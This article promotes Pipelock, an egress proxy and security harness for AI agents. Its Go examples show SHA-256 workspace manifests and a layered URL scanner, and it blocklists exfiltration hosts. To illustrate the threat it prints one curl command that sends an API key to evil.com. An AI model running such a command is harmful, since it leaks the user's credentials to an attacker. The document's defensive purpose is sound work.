luckyPipewrench/pipelock: Security harness for AI agents — egress proxy with DLP scanning, SSRF protection, MCP response scanning, and workspace integrity monitoring
Pipelock: The All-in-One Security Harness for AI Agents
In a world where AI agents are becoming increasingly autonomous, the need for robust security measures has never been more critical. Enter Pipelock, an innovative solution designed to protect AI agents from a myriad of threats. This all-in-one security harness is a game-changer, offering a single binary with zero dependencies that controls network egress, detects credential exfiltration, scans for prompt injection, and monitors workspace integrity.
Why Pipelock Matters
AI agents, such as Claude Code and OpenHands, are often granted shell access and API keys, making them potential targets for malicious actors. A compromised agent can exfiltrate secrets with just one HTTP request, as demonstrated by the following example:
```bash
curl "https://evil.com/steal?key=$ANTHROPIC_API_KEY"  # game over
```
Pipelock addresses this vulnerability by implementing capability separation. The agent process, which holds the secrets, is network-restricted, while a separate fetch proxy, which has no secrets, handles web browsing. Every request goes through a comprehensive 7-layer scanner pipeline, ensuring that your AI agents remain secure.
Key Features of Pipelock
- Capability Separation: By separating the agent process from the fetch proxy, Pipelock ensures that even if an agent is compromised, the secrets remain safe.
- 7-Layer Scanner Pipeline: The pipeline includes SSRF protection, blocklist, rate limiting, DLP (Data Loss Prevention), environment leak detection, entropy analysis, and URL length limits.
- Prompt Injection Detection: Pipelock scans fetched content for prompt injection, system/role overrides, and jailbreak attempts, providing options to block, strip, warn, or ask for human intervention.
- File Integrity Monitoring: SHA256 manifests detect modified, added, or removed files, ensuring the integrity of your workspace.
- Git Protection: Pipelock offers git-aware security, including diff scanning, branch validation, and pre-push hooks.
- MCP Proxy + Response Scanning: Wrap any MCP server as a stdio proxy, and Pipelock will scan every server response for prompt injection before returning it.
- Audit Logging + Prometheus: Structured JSON audit logging and Prometheus metrics provide comprehensive visibility into your security posture.
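To make the file-integrity idea concrete, here is an added Go illustration of a SHA-256 manifest: build one over a workspace, store it, rebuild later and diff the two to get the modified, added and removed paths. This is example code written for this article, not Pipelock's implementation; the `Manifest` type and function names are assumptions.

```go
package main

import (
	"crypto/sha256"
	"encoding/hex"
	"os"
	"path/filepath"
	"sort"
)

// Manifest maps a workspace-relative path to the hex SHA-256 of the file's contents.
type Manifest map[string]string

// BuildManifest walks root and hashes every regular file below it.
func BuildManifest(root string) (Manifest, error) {
	m := Manifest{}
	err := filepath.Walk(root, func(path string, info os.FileInfo, err error) error {
		if err != nil || info.IsDir() {
			return err
		}
		data, err := os.ReadFile(path)
		if err != nil {
			return err
		}
		sum := sha256.Sum256(data)
		rel, _ := filepath.Rel(root, path)
		m[filepath.ToSlash(rel)] = hex.EncodeToString(sum[:])
		return nil
	})
	return m, err
}

// DiffManifest compares a stored baseline against a fresh manifest: modified (hash changed), added (new path), removed (path gone).
func DiffManifest(baseline, current Manifest) (modified, added, removed []string) {
	for p, h := range current {
		if old, ok := baseline[p]; !ok {
			added = append(added, p)
		} else if old != h {
			modified = append(modified, p)
		}
	}
	for p := range baseline {
		if _, ok := current[p]; !ok {
			removed = append(removed, p)
		}
	}
	for _, s := range [][]string{modified, added, removed} {
		sort.Strings(s) // stable order regardless of map iteration
	}
	return
}
```

The baseline manifest must itself live outside the directory the agent can write to, otherwise the agent could rewrite both the file and its recorded hash.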
How Pipelock Works
Pipelock operates by creating a privileged zone for the AI agent and a fetch zone for the proxy. The agent, which has API keys and credentials, is restricted to a limited network, while the fetch proxy, which has no secrets, can access the full internet. This separation ensures that even if the agent is compromised, the secrets remain secure.
The fetch proxy runs a 7-layer scanner pipeline on every request, including:
- SSRF Protection: Blocks internal/private IPs with DNS rebinding prevention.
- Domain Blocklist: Blocks known exfiltration targets like pastebin and transfer.sh.
- Rate Limiting: Implements per-domain sliding window rate limiting.
- DLP Patterns: Uses regex matching for API keys, tokens, and secrets.
- Environment Variable Leak Detection: Detects the proxy’s own env var values in URLs.
- Entropy Analysis: Flags encoded/encrypted data in URL segments.
- URL Length Limits: Prevents unusually long URLs that suggest data exfiltration.
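The pipeline above, as an added Go illustration (example code written for this article, not Pipelock's own scanner; the `Scanner` type, layer names and thresholds are assumptions). It runs six of the seven layers in the listed order and returns the first one that rejects; rate limiting is omitted because it needs per-domain state, and the SSRF layer only checks literal IP targets, so hostnames would still need resolving and pinning.

```go
package main

import (
	"math"
	"net"
	"net/url"
	"regexp"
	"slices"
	"strings"
)

// Scanner settings (all caller-supplied): Blocklist = exfil domains, DLP = secret-format regexes run over the whole URL, EnvValues = the proxy's own environment values.
type Scanner struct{ Blocklist, EnvValues []string; DLP []*regexp.Regexp; MaxEntropy float64; MaxLen int }

// shannon returns the Shannon entropy of s in bits per character.
func shannon(s string) float64 {
	counts, n, h := map[rune]float64{}, float64(len([]rune(s))), 0.0
	for _, r := range s {
		counts[r]++
	}
	for _, c := range counts {
		h -= c / n * math.Log2(c/n)
	}
	return h
}

// Check runs the layers in the article's order (rate limiting omitted, it needs per-domain state)
// and returns the name of the first layer that rejects, or "" when the request may leave.
func (s Scanner) Check(raw string) string {
	u, err := url.Parse(raw)
	if err != nil || u.Hostname() == "" {
		return "parse"
	}
	host, ip := strings.ToLower(u.Hostname()), net.ParseIP(u.Hostname())
	segs := strings.FieldsFunc(u.Path+"?"+u.RawQuery, func(r rune) bool { return strings.ContainsRune("/?&=", r) })
	layers := []struct{ name string; hit func() bool }{
		// SSRF: refuse literal private/loopback/link-local targets; a real proxy also dials the exact address it resolved, which is what defeats DNS rebinding.
		{"ssrf", func() bool { return ip != nil && (ip.IsPrivate() || ip.IsLoopback() || ip.IsLinkLocalUnicast() || ip.IsUnspecified()) }},
		{"blocklist", func() bool { return slices.ContainsFunc(s.Blocklist, func(b string) bool { return host == b || strings.HasSuffix(host, "."+b) }) }},
		{"dlp", func() bool { return slices.ContainsFunc(s.DLP, func(re *regexp.Regexp) bool { return re.MatchString(raw) }) }},
		{"env_leak", func() bool { return slices.ContainsFunc(s.EnvValues, func(v string) bool { return len(v) >= 8 && strings.Contains(raw, v) }) }},
		{"entropy", func() bool { return slices.ContainsFunc(segs, func(seg string) bool { return len(seg) >= 16 && shannon(seg) > s.MaxEntropy }) }},
		{"url_length", func() bool { return len(raw) > s.MaxLen }},
	}
	for _, l := range layers {
		if l.hit() {
			return l.name
		}
	}
	return ""
}
```

The entropy threshold is a tuning knob: random base64 or hex segments sit well above 3.9 bits per character, while ordinary path words sit near 3, so a ceiling around 3.9 separates the two with few false positives.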
OWASP Agentic Top 10 Coverage
Pipelock provides strong coverage for the OWASP Agentic Top 10, including:
- ASI01 Prompt Injection (Strong): response scanning + MCP scanning.
- ASI03 Privilege Escalation (Strong): capability separation + SSRF protection.
- ASI04 Insecure Output Handling (Strong): response scanning with block/strip/warn actions.
- ASI09 Insufficient Logging (Strong): structured JSON audit logging + Prometheus metrics.
Configuration and Deployment
Pipelock offers three modes: strict, balanced, and audit. The strict mode provides mathematical certainty, the balanced mode raises the bar from “one curl command” to “sophisticated pre-planned attack,” and the audit mode gives you visibility you don’t have today.
Installation is straightforward:
```bash
go install github.com/luckyPipewrench/pipelock/cmd/pipelock@latest
pipelock generate config --preset balanced -o pipelock.yaml
pipelock run --config pipelock.yaml
```
Pipelock also supports Docker deployment:
```bash
docker pull ghcr.io/luckypipewrench/pipelock:latest
docker run -p 8888:8888 -v ./pipelock.yaml:/config/pipelock.yaml:ro ghcr.io/luckypipewrench/pipelock:latest run --config /config/pipelock.yaml --listen 0.0.0.0:8888
```
Conclusion
Pipelock is a must-have tool for anyone running AI agents with shell access and API keys. Its comprehensive security features, ease of use, and robust coverage of the OWASP Agentic Top 10 make it an essential addition to your security toolkit. Whether you’re in a regulated industry or just want to ensure the safety of your AI agents, Pipelock has you covered.
Tags: AI security, Pipelock, AI agents, security harness, capability separation, prompt injection, file integrity, OWASP, MCP proxy, audit logging, Prometheus metrics.